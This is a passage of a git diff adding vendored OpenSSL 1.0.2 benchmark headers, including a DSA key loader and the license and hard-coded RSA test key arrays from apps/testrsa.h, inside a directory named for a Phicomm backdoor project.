+    0xBF, 0x1D, 0x84, 0x77, 0x0A, 0x75, 0xF3, 0x87, 0x1D, 0x08, 0x4C, 0xA6,
+    0xD1, 0xA9, 0x1C, 0x1E, 0x12, 0x1E, 0xE1, 0xC7, 0x30, 0x28, 0x76, 0xA5,
+    0x7F, 0x6C, 0x85, 0x96, 0x2B, 0x6F, 0xDB, 0x80, 0x66, 0x26, 0xAE, 0xF5,
+    0x93, 0xC7, 0x8E, 0xAE, 0x9A, 0xED, 0xE4, 0xCA, 0x04, 0xEA, 0x3B, 0x72,
+    0xEF, 0xDC, 0x87, 0xED, 0x0D, 0xA5, 0x4C, 0x4A, 0xDD, 0x71, 0x22, 0x64,
+    0x59, 0x69, 0x4E, 0x8E, 0xBF, 0x43, 0xDC, 0xAB, 0x8E, 0x66, 0xBB, 0x01,
+    0xB6, 0xF4, 0xE7, 0xFD, 0xD2, 0xAD, 0x9F, 0x36, 0xC1, 0xA0, 0x29, 0x99,
+    0xD1, 0x96, 0x70, 0x59, 0x06, 0x78, 0x35, 0xBD, 0x65, 0x55, 0x52, 0x9E,
+    0xF8, 0xB2, 0xE5, 0x38,
+};
+
+DSA *get_dsa2048()
+{
+    DSA *dsa;
+
+    if ((dsa = DSA_new()) == NULL)
+        return (NULL);
+    dsa->priv_key = BN_bin2bn(dsa2048_priv, sizeof(dsa2048_priv), NULL);
+    dsa->pub_key = BN_bin2bn(dsa2048_pub, sizeof(dsa2048_pub), NULL);
+    dsa->p = BN_bin2bn(dsa2048_p, sizeof(dsa2048_p), NULL);
+    dsa->q = BN_bin2bn(dsa2048_q, sizeof(dsa2048_q), NULL);
+    dsa->g = BN_bin2bn(dsa2048_g, sizeof(dsa2048_g), NULL);
+    if ((dsa->priv_key == NULL) || (dsa->pub_key == NULL) || (dsa->p == NULL)
+        || (dsa->q == NULL) || (dsa->g == NULL))
+        return (NULL);
+    return (dsa);
+}
+
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+static int rnd_fake = 0;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testrsa.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testrsa.h
new file mode 100644
index 0000000..a7913fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/testrsa.h
@@ -0,0 +1,518 @@
+/* apps/testrsa.h */
+/* used by apps/speed.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+static unsigned char test512[] = {
+    0x30, 0x82, 0x01, 0x3a, 0x02, 0x01, 0x00, 0x02, 0x41, 0x00,
+    0xd6, 0x33, 0xb9, 0xc8, 0xfb, 0x4f, 0x3c, 0x7d, 0xc0, 0x01,
+    0x86, 0xd0, 0xe7, 0xa0, 0x55, 0xf2, 0x95, 0x93, 0xcc, 0x4f,
+    0xb7, 0x5b, 0x67, 0x5b, 0x94, 0x68, 0xc9, 0x34, 0x15, 0xde,
+    0xa5, 0x2e, 0x1c, 0x33, 0xc2, 0x6e, 0xfc, 0x34, 0x5e, 0x71,
+    0x13, 0xb7, 0xd6, 0xee, 0xd8, 0xa5, 0x65, 0x05, 0x72, 0x87,
+    0xa8, 0xb0, 0x77, 0xfe, 0x57, 0xf5, 0xfc, 0x5f, 0x55, 0x83,
+    0x87, 0xdd, 0x57, 0x49, 0x02, 0x03, 0x01, 0x00, 0x01, 0x02,
+    0x41, 0x00, 0xa7, 0xf7, 0x91, 0xc5, 0x0f, 0x84, 0x57, 0xdc,
+    0x07, 0xf7, 0x6a, 0x7f, 0x60, 0x52, 0xb3, 0x72, 0xf1, 0x66,
+    0x1f, 0x7d, 0x97, 0x3b, 0x9e, 0xb6, 0x0a, 0x8f, 0x8c, 0xcf,
+    0x42, 0x23, 0x00, 0x04, 0xd4, 0x28, 0x0e, 0x1c, 0x90, 0xc4,
+    0x11, 0x25, 0x25, 0xa5, 0x93, 0xa5, 0x2f, 0x70, 0x02, 0xdf,
+    0x81, 0x9c, 0x49, 0x03, 0xa0, 0xf8, 0x6d, 0x54, 0x2e, 0x26,
+    0xde, 0xaa, 0x85, 0x59, 0xa8, 0x31, 0x02, 0x21, 0x00, 0xeb,
+    0x47, 0xd7, 0x3b, 0xf6, 0xc3, 0xdd, 0x5a, 0x46, 0xc5, 0xb9,
+    0x2b, 0x9a, 0xa0, 0x09, 0x8f, 0xa6, 0xfb, 0xf3, 0x78, 0x7a,
+    0x33, 0x70, 0x9d, 0x0f, 0x42, 0x6b, 0x13, 0x68, 0x24, 0xd3,
+    0x15, 0x02, 0x21, 0x00, 0xe9, 0x10, 0xb0, 0xb3, 0x0d, 0xe2,
+    0x82, 0x68, 0x77, 0x8a, 0x6e, 0x7c, 0xda, 0xbc, 0x3e, 0x53,
+    0x83, 0xfb, 0xd6, 0x22, 0xe7, 0xb5, 0xae, 0x6e, 0x80, 0xda,
+    0x00, 0x55, 0x97, 0xc1, 0xd0, 0x65, 0x02, 0x20, 0x4c, 0xf8,
+    0x73, 0xb1, 0x6a, 0x49, 0x29, 0x61, 0x1f, 0x46, 0x10, 0x0d,
+    0xf3, 0xc7, 0xe7, 0x58, 0xd7, 0x88, 0x15, 0x5e, 0x94, 0x9b,
+    0xbf, 0x7b, 0xa2, 0x42, 0x58, 0x45, 0x41, 0x0c, 0xcb, 0x01,
+    0x02, 0x20, 0x12, 0x11, 0xba, 0x31, 0x57, 0x9d, 0x3d, 0x11,
+    0x0e, 0x5b, 0x8c, 0x2f, 0x5f, 0xe2, 0x02, 0x4f, 0x05, 0x47,
+    0x8c, 0x15, 0x8e, 0xb3, 0x56, 0x3f, 0xb8, 0xfb, 0xad, 0xd4,
+    0xf4, 0xfc, 0x10, 0xc5, 0x02, 0x20, 0x18, 0xa1, 0x29, 0x99,
+    0x5b, 0xd9, 0xc8, 0xd4, 0xfc, 0x49, 0x7a, 0x2a, 0x21, 0x2c,
+    0x49, 0xe4, 0x4f, 0xeb, 0xef, 0x51, 0xf1, 0xab, 0x6d, 0xfb,
+    0x4b, 0x14, 0xe9, 0x4b, 0x52, 0xb5, 0x82, 0x2c,
+};
+
+static unsigned char test1024[] = {
+    0x30, 0x82, 0x02, 0x5c, 0x02, 0x01, 0x00, 0x02, 0x81, 0x81,
+    0x00, 0xdc, 0x98, 0x43, 0xe8, 0x3d, 0x43, 0x5b, 0xe4, 0x05,
+    0xcd, 0xd0, 0xa9, 0x3e, 0xcb, 0x83, 0x75, 0xf6, 0xb5, 0xa5,
+    0x9f, 0x6b, 0xe9, 0x34, 0x41, 0x29, 0x18, 0xfa, 0x6a, 0x55,
+    0x4d, 0x70, 0xfc, 0xec, 0xae, 0x87, 0x38, 0x0a, 0x20, 0xa9,
+    0xc0, 0x45, 0x77, 0x6e, 0x57, 0x60, 0x57, 0xf4, 0xed, 0x96,
+    0x22, 0xcb, 0x8f, 0xe1, 0x33, 0x3a, 0x17, 0x1f, 0xed, 0x37,
+    0xa5, 0x6f, 0xeb, 0xa6, 0xbc, 0x12, 0x80, 0x1d, 0x53, 0xbd,
+    0x70, 0xeb, 0x21, 0x76, 0x3e, 0xc9, 0x2f, 0x1a, 0x45, 0x24,
+    0x82, 0xff, 0xcd, 0x59, 0x32, 0x06, 0x2e, 0x12, 0x3b, 0x23,
+    0x78, 0xed, 0x12, 0x3d, 0xe0, 0x8d, 0xf9, 0x67, 0x4f, 0x37,
+    0x4e, 0x47, 0x02, 0x4c, 0x2d, 0xc0, 0x4f, 0x1f, 0xb3, 0x94,
+    0xe1, 0x41, 0x2e, 0x2d, 0x90, 0x10, 0xfc, 0x82, 0x91, 0x8b,
+    0x0f, 0x22, 0xd4, 0xf2, 0xfc, 0x2c, 0xab, 0x53, 0x55, 0x02,
+    0x03, 0x01, 0x00, 0x01, 0x02, 0x81, 0x80, 0x2b, 0xcc, 0x3f,
+    0x8f, 0x58, 0xba, 0x8b, 0x00, 0x16, 0xf6, 0xea, 0x3a, 0xf0,
+    0x30, 0xd0, 0x05, 0x17, 0xda, 0xb0, 0xeb, 0x9a, 0x2d, 0x4f,
+    0x26, 0xb0, 0xd6, 0x38, 0xc1, 0xeb, 0xf5, 0xd8, 0x3d, 0x1f,
+    0x70, 0xf7, 0x7f, 0xf4, 0xe2, 0xcf, 0x51, 0x51, 0x79, 0x88,
+    0xfa, 0xe8, 0x32, 0x0e, 0x7b, 0x2d, 0x97, 0xf2, 0xfa, 0xba,
+    0x27, 0xc5, 0x9c, 0xd9, 0xc5, 0xeb, 0x8a, 0x79, 0x52, 0x3c,
+    0x64, 0x34, 0x7d, 0xc2, 0xcf, 0x28, 0xc7, 0x4e, 0xd5, 0x43,
+    0x0b, 0xd1, 0xa6, 0xca, 0x6d, 0x03, 0x2d, 0x72, 0x23, 0xbc,
+    0x6d, 0x05, 0xfa, 0x16, 0x09, 0x2f, 0x2e, 0x5c, 0xb6, 0xee,
+    0x74, 0xdd, 0xd2, 0x48, 0x8e, 0x36, 0x0c, 0x06, 0x3d, 0x4d,
+    0xe5, 0x10, 0x82, 0xeb, 0x6a, 0xf3, 0x4b, 0x9f, 0xd6, 0xed,
+    0x11, 0xb1, 0x6e, 0xec, 0xf4, 0xfe, 0x8e, 0x75, 0x94, 0x20,
+    0x2f, 0xcb, 0xac, 0x46, 0xf1, 0x02, 0x41, 0x00, 0xf9, 0x8c,
+    0xa3, 0x85, 0xb1, 0xdd, 0x29, 0xaf, 0x65, 0xc1, 0x33, 0xf3,
+    0x95, 0xc5, 0x52, 0x68, 0x0b, 0xd4, 0xf1, 0xe5, 0x0e, 0x02,
+    0x9f, 0x4f, 0xfa, 0x77, 0xdc, 0x46, 0x9e, 0xc7, 0xa6, 0xe4,
+    0x16, 0x29, 0xda, 0xb0, 0x07, 0xcf, 0x5b, 0xa9, 0x12, 0x8a,
+    0xdd, 0x63, 0x0a, 0xde, 0x2e, 0x8c, 0x66, 0x8b, 0x8c, 0xdc,
+    0x19, 0xa3, 0x7e, 0xf4, 0x3b, 0xd0, 0x1a, 0x8c, 0xa4, 0xc2,
+    0xe1, 0xd3, 0x02, 0x41, 0x00, 0xe2, 0x4c, 0x05, 0xf2, 0x04,
+    0x86, 0x4e, 0x61, 0x43, 0xdb, 0xb0, 0xb9, 0x96, 0x86, 0x52,
+    0x2c, 0xca, 0x8d, 0x7b, 0xab, 0x0b, 0x13, 0x0d, 0x7e, 0x38,
+    0x5b, 0xe2, 0x2e, 0x7b, 0x0e, 0xe7, 0x19, 0x99, 0x38, 0xe7,
+    0xf2, 0x21, 0xbd, 0x85, 0x85, 0xe3, 0xfd, 0x28, 0x77, 0x20,
+    0x31, 0x71, 0x2c, 0xd0, 0xff, 0xfb, 0x2e, 0xaf, 0x85, 0xb4,
+    0x86, 0xca, 0xf3, 0xbb, 0xca, 0xaa, 0x0f, 0x95, 0x37, 0x02,
+    0x40, 0x0e, 0x41, 0x9a, 0x95, 0xe8, 0xb3, 0x59, 0xce, 0x4b,
+    0x61, 0xde, 0x35, 0xec, 0x38, 0x79, 0x9c, 0xb8, 0x10, 0x52,
+    0x41, 0x63, 0xab, 0x82, 0xae, 0x6f, 0x00, 0xa9, 0xf4, 0xde,
+    0xdd, 0x49, 0x0b, 0x7e, 0xb8, 0xa5, 0x65, 0xa9, 0x0c, 0x8f,
+    0x8f, 0xf9, 0x1f, 0x35, 0xc6, 0x92, 0xb8, 0x5e, 0xb0, 0x66,
+    0xab, 0x52, 0x40, 0xc0, 0xb6, 0x36, 0x6a, 0x7d, 0x80, 0x46,
+    0x04, 0x02, 0xe5, 0x9f, 0x41, 0x02, 0x41, 0x00, 0xc0, 0xad,
+    0xcc, 0x4e, 0x21, 0xee, 0x1d, 0x24, 0x91, 0xfb, 0xa7, 0x80,
+    0x8d, 0x9a, 0xb6, 0xb3, 0x2e, 0x8f, 0xc2, 0xe1, 0x82, 0xdf,
+    0x69, 0x18, 0xb4, 0x71, 0xff, 0xa6, 0x65, 0xde, 0xed, 0x84,
+    0x8d, 0x42, 0xb7, 0xb3, 0x21, 0x69, 0x56, 0x1c, 0x07, 0x60,
+    0x51, 0x29, 0x04, 0xff, 0x34, 0x06, 0xdd, 0xb9, 0x67, 0x2c,
+    0x7c, 0x04, 0x93, 0x0e, 0x46, 0x15, 0xbb, 0x2a, 0xb7, 0x1b,
+    0xe7, 0x87, 0x02, 0x40, 0x78, 0xda, 0x5d, 0x07, 0x51, 0x0c,
+    0x16, 0x7a, 0x9f, 0x29, 0x20, 0x84, 0x0d, 0x42, 0xfa, 0xd7,
+    0x00, 0xd8, 0x77, 0x7e, 0xb0, 0xb0, 0x6b, 0xd6, 0x5b, 0x53,
+    0xb8, 0x9b, 0x7a, 0xcd, 0xc7, 0x2b, 0xb8, 0x6a, 0x63, 0xa9,
+    0xfb, 0x6f, 0xa4, 0x72, 0xbf, 0x4c, 0x5d, 0x00, 0x14, 0xba,
+    0xfa, 0x59, 0x88, 0xed, 0xe4, 0xe0, 0x8c, 0xa2, 0xec, 0x14,
+    0x7e, 0x2d, 0xe2, 0xf0, 0x46, 0x49, 0x95, 0x45,
+};
+
+static unsigned char test2048[] = {
+    0x30, 0x82, 0x04, 0xa3, 0x02, 0x01, 0x00, 0x02, 0x82, 0x01,
+    0x01, 0x00, 0xc0, 0xc0, 0xce, 0x3e, 0x3c, 0x53, 0x67, 0x3f,
+    0x4f, 0xc5, 0x2f, 0xa4, 0xc2, 0x5a, 0x2f, 0x58, 0xfd, 0x27,
+    0x52, 0x6a, 0xe8, 0xcf, 0x4a, 0x73, 0x47, 0x8d, 0x25, 0x0f,
+    0x5f, 0x03, 0x26, 0x78, 0xef, 0xf0, 0x22, 0x12, 0xd3, 0xde,
+    0x47, 0xb2, 0x1c, 0x0b, 0x38, 0x63, 0x1a, 0x6c, 0x85, 0x7a,
+    0x80, 0xc6, 0x8f, 0xa0, 0x41, 0xaf, 0x62, 0xc4, 0x67, 0x32,
+    0x88, 0xf8, 0xa6, 0x9c, 0xf5, 0x23, 0x1d, 0xe4, 0xac, 0x3f,
+    0x29, 0xf9, 0xec, 0xe1, 0x8b, 0x26, 0x03, 0x2c, 0xb2, 0xab,
+    0xf3, 0x7d, 0xb5, 0xca, 0x49, 0xc0, 0x8f, 0x1c, 0xdf, 0x33,
+    0x3a, 0x60, 0xda, 0x3c, 0xb0, 0x16, 0xf8, 0xa9, 0x12, 0x8f,
+    0x64, 0xac, 0x23, 0x0c, 0x69, 0x64, 0x97, 0x5d, 0x99, 0xd4,
+    0x09, 0x83, 0x9b, 0x61, 0xd3, 0xac, 0xf0, 0xde, 0xdd, 0x5e,
+    0x9f, 0x44, 0x94, 0xdb, 0x3a, 0x4d, 0x97, 0xe8, 0x52, 0x29,
+    0xf7, 0xdb, 0x94, 0x07, 0x45, 0x90, 0x78, 0x1e, 0x31, 0x0b,
+    0x80, 0xf7, 0x57, 0xad, 0x1c, 0x79, 0xc5, 0xcb, 0x32, 0xb0,
+    0xce, 0xcd, 0x74, 0xb3, 0xe2, 0x94, 0xc5, 0x78, 0x2f, 0x34,
+    0x1a, 0x45, 0xf7, 0x8c, 0x52, 0xa5, 0xbc, 0x8d, 0xec, 0xd1,
+    0x2f, 0x31, 0x3b, 0xf0, 0x49, 0x59, 0x5e, 0x88, 0x9d, 0x15,
+    0x92, 0x35, 0x32, 0xc1, 0xe7, 0x61, 0xec, 0x50, 0x48, 0x7c,
+    0xba, 0x05, 0xf9, 0xf8, 0xf8, 0xa7, 0x8c, 0x83, 0xe8, 0x66,
+    0x5b, 0xeb, 0xfe, 0xd8, 0x4f, 0xdd, 0x6d, 0x36, 0xc0, 0xb2,
+    0x90, 0x0f, 0xb8, 0x52, 0xf9, 0x04, 0x9b, 0x40, 0x2c, 0x27,
+    0xd6, 0x36, 0x8e, 0xc2, 0x1b, 0x44, 0xf3, 0x92, 0xd5, 0x15,
+    0x9e, 0x9a, 0xbc, 0xf3, 0x7d, 0x03, 0xd7, 0x02, 0x14, 0x20,
+    0xe9, 0x10, 0x92, 0xfd, 0xf9, 0xfc, 0x8f, 0xe5, 0x18, 0xe1,
+    0x95, 0xcc, 0x9e, 0x60, 0xa6, 0xfa, 0x38, 0x4d, 0x02, 0x03,
+    0x01, 0x00, 0x01, 0x02, 0x82, 0x01, 0x00, 0x00, 0xc3, 0xc3,
+    0x0d, 0xb4, 0x27, 0x90, 0x8d, 0x4b, 0xbf, 0xb8, 0x84, 0xaa,
+    0xd0, 0xb8, 0xc7, 0x5d, 0x99, 0xbe, 0x55, 0xf6, 0x3e, 0x7c,
+    0x49, 0x20, 0xcb, 0x8a, 0x8e, 0x19, 0x0e, 0x66, 0x24, 0xac,
+    0xaf, 0x03, 0x33, 0x97, 0xeb, 0x95, 0xd5, 0x3b, 0x0f, 0x40,
+    0x56, 0x04, 0x50, 0xd1, 0xe6, 0xbe, 0x84, 0x0b, 0x25, 0xd3,
+    0x9c, 0xe2, 0x83, 0x6c, 0xf5, 0x62, 0x5d, 0xba, 0x2b, 0x7d,
+    0x3d, 0x7a, 0x6c, 0xe1, 0xd2, 0x0e, 0x54, 0x93, 0x80, 0x01,
+    0x91, 0x51, 0x09, 0xe8, 0x5b, 0x8e, 0x47, 0xbd, 0x64, 0xe4,
+    0x0e, 0x03, 0x83, 0x55, 0xcf, 0x5a, 0x37, 0xf0, 0x25, 0xb5,
+    0x7d, 0x21, 0xd7, 0x69, 0xdf, 0x6f, 0xc2, 0xcf, 0x10, 0xc9,
+    0x8a, 0x40, 0x9f, 0x7a, 0x70, 0xc0, 0xe8, 0xe8, 0xc0, 0xe6,
+    0x9a, 0x15, 0x0a, 0x8d, 0x4e, 0x46, 0xcb, 0x7a, 0xdb, 0xb3,
+    0xcb, 0x83, 0x02, 0xc4, 0xf0, 0xab, 0xeb, 0x02, 0x01, 0x0e,
+    0x23, 0xfc, 0x1d, 0xc4, 0xbd, 0xd4, 0xaa, 0x5d, 0x31, 0x46,
+    0x99, 0xce, 0x9e, 0xf8, 0x04, 0x75, 0x10, 0x67, 0xc4, 0x53,
+    0x47, 0x44, 0xfa, 0xc2, 0x25, 0x73, 0x7e, 0xd0, 0x8e, 0x59,
+    0xd1, 0xb2, 0x5a, 0xf4, 0xc7, 0x18, 0x92, 0x2f, 0x39, 0xab,
+    0xcd, 0xa3, 0xb5, 0xc2, 0xb9, 0xc7, 0xb9, 0x1b, 0x9f, 0x48,
+    0xfa, 0x13, 0xc6, 0x98, 0x4d, 0xca, 0x84, 0x9c, 0x06, 0xca,
+    0xe7, 0x89, 0x01, 0x04, 0xc4, 0x6c, 0xfd, 0x29, 0x59, 0x35,
+    0xe7, 0xf3, 0xdd, 0xce, 0x64, 0x59, 0xbf, 0x21, 0x13, 0xa9,
+    0x9f, 0x0e, 0xc5, 0xff, 0xbd, 0x33, 0x00, 0xec, 0xac, 0x6b,
+    0x11, 0xef, 0x51, 0x5e, 0xad, 0x07, 0x15, 0xde, 0xb8, 0x5f,
+    0xc6, 0xb9, 0xa3, 0x22, 0x65, 0x46, 0x83, 0x14, 0xdf, 0xd0,
+    0xf1, 0x44, 0x8a, 0xe1, 0x9c, 0x23, 0x33, 0xb4, 0x97, 0x33,
+    0xe6, 0x6b, 0x81, 0x02, 0x81, 0x81, 0x00, 0xec, 0x12, 0xa7,
+    0x59, 0x74, 0x6a, 0xde, 0x3e, 0xad, 0xd8, 0x36, 0x80, 0x50,
+    0xa2, 0xd5, 0x21, 0x81, 0x07, 0xf1, 0xd0, 0x91, 0xf2, 0x6c,
+    0x12, 0x2f, 0x9d, 0x1a, 0x26, 0xf8, 0x30, 0x65, 0xdf, 0xe8,
+    0xc0, 0x9b, 0x6a, 0x30, 0x98, 0x82, 0x87, 0xec, 0xa2, 0x56,
+    0x87, 0x62, 0x6f, 0xe7, 0x9f, 0xf6, 0x56, 0xe6, 0x71, 0x8f,
+    0x49, 0x86, 0x93, 0x5a, 0x4d, 0x34, 0x58, 0xfe, 0xd9, 0x04,
+    0x13, 0xaf, 0x79, 0xb7, 0xad, 0x11, 0xd1, 0x30, 0x9a, 0x14,
+    0x06, 0xa0, 0xfa, 0xb7, 0x55, 0xdc, 0x6c, 0x5a, 0x4c, 0x2c,
+    0x59, 0x56, 0xf6, 0xe8, 0x9d, 0xaf, 0x0a, 0x78, 0x99, 0x06,
+    0x06, 0x9e, 0xe7, 0x9c, 0x51, 0x55, 0x43, 0xfc, 0x3b, 0x6c,
+    0x0b, 0xbf, 0x2d, 0x41, 0xa7, 0xaf, 0xb7, 0xe0, 0xe8, 0x28,
+    0x18, 0xb4, 0x13, 0xd1, 0xe6, 0x97, 0xd0, 0x9f, 0x6a, 0x80,
+    0xca, 0xdd, 0x1a, 0x7e, 0x15, 0x02, 0x81, 0x81, 0x00, 0xd1,
+    0x06, 0x0c, 0x1f, 0xe3, 0xd0, 0xab, 0xd6, 0xca, 0x7c, 0xbc,
+    0x7d, 0x13, 0x35, 0xce, 0x27, 0xcd, 0xd8, 0x49, 0x51, 0x63,
+    0x64, 0x0f, 0xca, 0x06, 0x12, 0xfc, 0x07, 0x3e, 0xaf, 0x61,
+    0x6d, 0xe2, 0x53, 0x39, 0x27, 0xae, 0xc3, 0x11, 0x9e, 0x94,
+    0x01, 0x4f, 0xe3, 0xf3, 0x67, 0xf9, 0x77, 0xf9, 0xe7, 0x95,
+    0x3a, 0x6f, 0xe2, 0x20, 0x73, 0x3e, 0xa4, 0x7a, 0x28, 0xd4,
+    0x61, 0x97, 0xf6, 0x17, 0xa0, 0x23, 0x10, 0x2b, 0xce, 0x84,
+    0x57, 0x7e, 0x25, 0x1f, 0xf4, 0xa8, 0x54, 0xd2, 0x65, 0x94,
+    0xcc, 0x95, 0x0a, 0xab, 0x30, 0xc1, 0x59, 0x1f, 0x61, 0x8e,
+    0xb9, 0x6b, 0xd7, 0x4e, 0xb9, 0x83, 0x43, 0x79, 0x85, 0x11,
+    0xbc, 0x0f, 0xae, 0x25, 0x20, 0x05, 0xbc, 0xd2, 0x48, 0xa1,
+    0x68, 0x09, 0x84, 0xf6, 0x12, 0x9a, 0x66, 0xb9, 0x2b, 0xbb,
+    0x76, 0x03, 0x17, 0x46, 0x4e, 0x97, 0x59, 0x02, 0x81, 0x80,
+    0x09, 0x4c, 0xfa, 0xd6, 0xe5, 0x65, 0x48, 0x78, 0x43, 0xb5,
+    0x1f, 0x00, 0x93, 0x2c, 0xb7, 0x24, 0xe8, 0xc6, 0x7d, 0x5a,
+    0x70, 0x45, 0x92, 0xc8, 0x6c, 0xa3, 0xcd, 0xe1, 0xf7, 0x29,
+    0x40, 0xfa, 0x3f, 0x5b, 0x47, 0x44, 0x39, 0xc1, 0xe8, 0x72,
+    0x9e, 0x7a, 0x0e, 0xda, 0xaa, 0xa0, 0x2a, 0x09, 0xfd, 0x54,
+    0x93, 0x23, 0xaa, 0x37, 0x85, 0x5b, 0xcc, 0xd4, 0xf9, 0xd8,
+    0xff, 0xc1, 0x61, 0x0d, 0xbd, 0x7e, 0x18, 0x24, 0x73, 0x6d,
+    0x40, 0x72, 0xf1, 0x93, 0x09, 0x48, 0x97, 0x6c, 0x84, 0x90,
+    0xa8, 0x46, 0x14, 0x01, 0x39, 0x11, 0xe5, 0x3c, 0x41, 0x27,
+    0x32, 0x75, 0x24, 0xed, 0xa1, 0xd9, 0x12, 0x29, 0x8a, 0x28,
+    0x71, 0x89, 0x8d, 0xca, 0x30, 0xb0, 0x01, 0xc4, 0x2f, 0x82,
+    0x19, 0x14, 0x4c, 0x70, 0x1c, 0xb8, 0x23, 0x2e, 0xe8, 0x90,
+    0x49, 0x97, 0x92, 0x97, 0x6b, 0x7a, 0x9d, 0xb9, 0x02, 0x81,
+    0x80, 0x0f, 0x0e, 0xa1, 0x76, 0xf6, 0xa1, 0x44, 0x8f, 0xaf,
+    0x7c, 0x76, 0xd3, 0x87, 0xbb, 0xbb, 0x83, 0x10, 0x88, 0x01,
+    0x18, 0x14, 0xd1, 0xd3, 0x75, 0x59, 0x24, 0xaa, 0xf5, 0x16,
+    0xa5, 0xe9, 0x9d, 0xd1, 0xcc, 0xee, 0xf4, 0x15, 0xd9, 0xc5,
+    0x7e, 0x27, 0xe9, 0x44, 0x49, 0x06, 0x72, 0xb9, 0xfc, 0xd3,
+    0x8a, 0xc4, 0x2c, 0x36, 0x7d, 0x12, 0x9b, 0x5a, 0xaa, 0xdc,
+    0x85, 0xee, 0x6e, 0xad, 0x54, 0xb3, 0xf4, 0xfc, 0x31, 0xa1,
+    0x06, 0x3a, 0x70, 0x57, 0x0c, 0xf3, 0x95, 0x5b, 0x3e, 0xe8,
+    0xfd, 0x1a, 0x4f, 0xf6, 0x78, 0x93, 0x46, 0x6a, 0xd7, 0x31,
+    0xb4, 0x84, 0x64, 0x85, 0x09, 0x38, 0x89, 0x92, 0x94, 0x1c,
+    0xbf, 0xe2, 0x3c, 0x2a, 0xe0, 0xff, 0x99, 0xa3, 0xf0, 0x2b,
+    0x31, 0xc2, 0x36, 0xcd, 0x60, 0xbf, 0x9d, 0x2d, 0x74, 0x32,
+    0xe8, 0x9c, 0x93, 0x6e, 0xbb, 0x91, 0x7b, 0xfd, 0xd9, 0x02,
+    0x81, 0x81, 0x00, 0xa2, 0x71, 0x25, 0x38, 0xeb, 0x2a, 0xe9,
+    0x37, 0xcd, 0xfe, 0x44, 0xce, 0x90, 0x3f, 0x52, 0x87, 0x84,
+    0x52, 0x1b, 0xae, 0x8d, 0x22, 0x94, 0xce, 0x38, 0xe6, 0x04,
+    0x88, 0x76, 0x85, 0x9a, 0xd3, 0x14, 0x09, 0xe5, 0x69, 0x9a,
+    0xff, 0x58, 0x92, 0x02, 0x6a, 0x7d, 0x7c, 0x1e, 0x2c, 0xfd,
+    0xa8, 0xca, 0x32, 0x14, 0x4f, 0x0d, 0x84, 0x0d, 0x37, 0x43,
+    0xbf, 0xe4, 0x5d, 0x12, 0xc8, 0x24, 0x91, 0x27, 0x8d, 0x46,
+    0xd9, 0x54, 0x53, 0xe7, 0x62, 0x71, 0xa8, 0x2b, 0x71, 0x41,
+    0x8d, 0x75, 0xf8, 0x3a, 0xa0, 0x61, 0x29, 0x46, 0xa6, 0xe5,
+    0x82, 0xfa, 0x3a, 0xd9, 0x08, 0xfa, 0xfc, 0x63, 0xfd, 0x6b,
+    0x30, 0xbc, 0xf4, 0x4e, 0x9e, 0x8c, 0x25, 0x0c, 0xb6, 0x55,
+    0xe7, 0x3c, 0xd4, 0x4e, 0x0b, 0xfd, 0x8b, 0xc3, 0x0e, 0x1d,
+    0x9c, 0x44, 0x57, 0x8f, 0x1f, 0x86, 0xf7, 0xd5, 0x1b, 0xe4,
+    0x95,
+};
+
+static unsigned char test4096[] = {
+    0x30, 0x82, 0x09, 0x29, 0x02, 0x01, 0x00, 0x02, 0x82, 0x02,
+    0x01, 0x00, 0xc0, 0x71, 0xac, 0x1a, 0x13, 0x88, 0x82, 0x43,
